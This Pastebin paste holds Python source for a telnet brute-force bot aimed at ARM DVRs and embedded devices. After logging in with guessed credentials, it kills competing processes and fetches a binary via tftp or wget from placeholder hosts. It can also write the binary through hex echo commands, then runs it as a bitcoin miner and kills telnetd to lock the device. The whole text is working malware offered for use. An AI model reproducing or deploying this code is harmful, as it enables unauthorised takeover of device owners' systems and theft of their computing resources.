Guest User

Untitled

a guest
May 5th, 2014
913
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.     def attempt(self, username, password):
  2.         stage = 0
  3.         try:
  4.             tn = telnetlib.Telnet(self.host, 23, 5)
  5.             tn.read_until("login", 3)
  6.             tn.write(username + "\n")
  7.             tn.read_until("pass", 3)
  8.             tn.write(password + "\n")
  9.             stage = 4
  10.             out = tn.read_until("invalid", 5).lower()
  11.  
  12.             out = out.translate(None, " \r\n").rstrip().strip()
  13.             if len(out) == 0:
  14.                 return 1
  15.  
  16.             #check if it contains invalid, fail, again or unauthorized
  17.             for fail in failChecks:
  18.                 if fail in out:
  19.                     return 0
  20.  
  21.             if "#" not in out and ">" not in out and "$" not in out and "~" not in out:
  22.                 return 0
  23.  
  24.             self.azz = out
  25.             stage = 5
  26.  
  27.             tn.write("cat /proc/version && echo -ne '\\x64\\x6f\\x6e\\x65'\n")
  28.             procVersion = tn.read_until("done", 2).lower()
  29.             procVersionWorked = "done" in procVersion #irrelevant
  30.  
  31.             if "dvrdvs" in out or (procVersionWorked and "arm" in procVersion):
  32.                 self.killProcesses(tn, ["/var/run/", "/dev/"])
  33.                 binaryResult = 2
  34.                 if "v5l" in procVersion:
  35.                     binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333")#old ass binary
  36.                 else:#is a dvr
  37.                     binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333 -t 4 -q")
  38.                 if binaryResult == 0:
  39.                     self.killProcesses(tn, ["telnetd"])
  40.                     return 2
  41.                 else:
  42.                     return 0
  43.             return 0 #we didnt infect shit but save it anyways
  44.         except (socket.timeout, socket.error, EOFError):
  45.             if stage >= 4:
  46.                 return 0
  47.             return 1
  48.         except Exception, e:
  49.             if stage >= 4:
  50.                 return 0
  51.             return 1
  52.  
  53.         def killProcesses(self, tn, containList):
  54.             tn.write("ps && echo -ne '\\x64\\x6f\\x6e\\x65'\n")#lets just hope we have echo support...
  55.             psResult = tn.read_until("done", 10)#slow ass piece of shit
  56.             tokill = "echo start"
  57.             for containing in containList:
  58.                 if containing in psResult:
  59.                     splitPs = psResult.replace("\r","").split("\n")
  60.                     for psLine in splitPs:
  61.                         if containing in psLine:
  62.                             for part in psLine.split(" "):
  63.                                 if part != "":
  64.                                     tokill = tokill + "; kill -9 "+part
  65.                                     break
  66.                     tokill = tokill + "; echo -ne '\\x64\\x6f\\x6e\\x65'"
  67.                     tn.write(tokill+"\n")#kill all illegal processes! ~.~
  68.                     psResult = tn.read_until("done", 5)#lets lower from 10 to 5
  69.                        
  70.         def downloadBinary(self, tn, location, arch, web, args=""):
  71.  
  72.             if location.endswith("/"): #trim / off the end of location (we provide that)
  73.                 location = location[:-1]
  74.  
  75.             if web.endswith("/"): #trim / off the end of web (we provide that)
  76.                 web = web[:-1]
  77.  
  78.             tn.read_until("+!#CLEAN_READS#!+", 0.5)
  79.  
  80.             echoSupport = True
  81.  
  82.             if not echoSupport:
  83.                 return -1 #there's no point in even trying, this box sucks!
  84.  
  85.             tn.write("cd %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location))
  86.             tn.read_until("done", 1)#irrelevant
  87.  
  88.  
  89.             tn.write("tftp --help\n")
  90.             tftpSupport = "octets" in tn.read_until("octets", 2)
  91.  
  92.             tn.read_until("+!#CLEAN_READS#!+", 0.5)
  93.  
  94.             if tftpSupport: #cool, we have tftp, THIS IS A LITTLE BROKEN AT THE MOMENT
  95.                 tn.write("rm *; rm wget-%s; tftp -r wget-%s -g <TFTP SERVER> && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, arch))
  96.                 tftpResult = tn.read_until("done", 10)
  97.                 if not "done" in tftpResult:
  98.                     print("NOT THERE, RETREAT")
  99.                     return -2
  100.                 tn.write("chmod u+x wget-%s && ./wget-%s %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, web, arch))
  101.                 tftpResult = tn.read_until("done", 10)
  102.                 if not "done" in tftpResult:
  103.                     return -2
  104.                 tn.write("chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, args));
  105.                 tftpResult = tn.read_until("done", 10)
  106.                 if not "done" in tftpResult:
  107.                     return -2
  108.                 tftpWorked = "done" in tftpResult
  109.                 if tftpWorked:
  110.                     return 0 #exited successfully
  111.                 else:
  112.                     #clean up and carry on
  113.                     tn.write("rm %s; echo -ne '\\x64\\x6f\\x6e\\x65'\n" % arch)
  114.                     tn.read_until("done", 1)
  115.  
  116.  
  117.             #check if it's already there
  118.             tn.write("./rand0-%s -h\n" % arch)
  119.             writeWorked = "invalid" in tn.read_until("invalid", 2)
  120.  
  121.             if not writeWorked: #if we already downloaded it, why should we have to dl it again :P
  122.                 #looks like we're going to do it the old fashioned way
  123.                 binaryResult = self.writeBinary(tn, "wget-%s" % arch, "rand0-%s" % arch, location)
  124.  
  125.                 if binaryResult != 0:
  126.                     return 1 #alright then, we have echo support but shit didnt work?
  127.  
  128.             #download and execute (if true) the binary
  129.             tn.write("./rand0-%s %s/%s && chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, web, arch, arch, arch, args))
  130.             echoWorked = "done" in tn.read_until("done", 15)
  131.  
  132.             if echoWorked:
  133.                 return 0
  134.             else:
  135.                 return 1 #that didnt work, no idea why, but it didnt work.
  136.             return 0
  137.  
  138.         #writes a binary using the echo -ne 'HEX' method
  139.         def writeBinary(self, tn, localName, filename, location):
  140.             if location.endswith("/"): #trim / off the end of writeTo (we provide that)
  141.                 location = location[:-1]
  142.  
  143.             if localName in binaryLists: #store the binary lists in memory globally
  144.                 echoList = binaryLists[localName]
  145.             else:
  146.                 echoList = binaryLists[localName] = self.getEchoList(localName, filename, location)#and there's our echoList!
  147.  
  148.             tn.write("rm -rf %s/%s\n" % (location, filename)) #delete the old one if it exists
  149.             tn.read_until("+!#CLEAN_READS#!+", 0.5)
  150.             for line in echoList: #write the echo list 1 by 1
  151.                 tn.write(line + "\n")
  152.                 result = tn.read_until("done", 2) #use the done as verification
  153.                 if "done" in result:
  154.                     continue
  155.                 else:
  156.                     return -1 #echo not supported or something went wrong
  157.  
  158.             tn.write("chmod u+x %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location, filename)) #delete the old one if it exists
  159.             chmodded = "done" in tn.read_until("done", 2)
  160.             if chmodded:
  161.                 return 0
  162.             else:
  163.                 return -2 #whaaaaaaaaaaa
  164.             return 0
  165.                
  166.         #get a list of echo commands we need to run
  167.         #by iterating through a file and converting sections of bytes (50 a time)
  168.         #into hex and then putting them into an echo -ne 'HEX' line
  169.         #additionally, we write \\x64\\x6f\\x6e\\x65 (ascii: done) which will allow us to verify that worked after
  170.         def getEchoList(self, localName, outputName, location):
  171.             with open(localName, "rb") as f:
  172.                 converted = None
  173.                 result = []
  174.                 byte = f.read(1)
  175.                 i = 0
  176.                 current = ""
  177.  
  178.                 while byte != "":
  179.                     if i == 51:
  180.                         i = 0
  181.                         result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#\\x40 is for verification that it worked
  182.                         current = ""
  183.                     current = current + "\\x"+byte.encode("hex")
  184.                     byte = f.read(1)
  185.                     i = i + 1
  186.  
  187.                 if len(current) > 0:
  188.                     i = 0
  189.                     result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#\\x40 is for verification that it worked
  190.                     current = ""
  191.  
  192.                 return result
RAW Paste Data